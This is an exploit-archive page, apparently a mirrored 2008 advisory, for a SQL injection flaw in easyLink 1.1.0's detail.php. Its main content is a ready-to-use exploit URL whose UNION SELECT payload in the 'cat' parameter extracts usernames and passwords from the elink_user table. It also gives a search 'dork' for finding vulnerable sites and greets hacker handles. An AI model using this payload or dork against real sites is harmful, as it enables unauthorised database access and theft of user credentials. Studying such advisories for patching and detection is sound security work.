[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability
# Published : 2008-09-19
# Author : Egypt Coder
# Previous Title : Pluck 4.5.3 (update.php) Remote File Corruption Exploit
# Next Title : Explay CMS <= 2.1 Persistent XSS and CSRF Vulnerability
================================================================================
easyLink V1.1.0 (detail.php) Remote SQL Injection Vulnerability
================================================================================
Discovered By: Egypt Coder
home : WWW.Sec-Area.com
Mail: Egyptcoder@hotmail.com
Dork: Engine powered by easyLink V1.1.0.
Exploit :
http://localhost/links/detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user
Greets rUnViruS, Error Code, H666p , Fear Master , ProViDoR
# www.Syue.com [2008-09-19]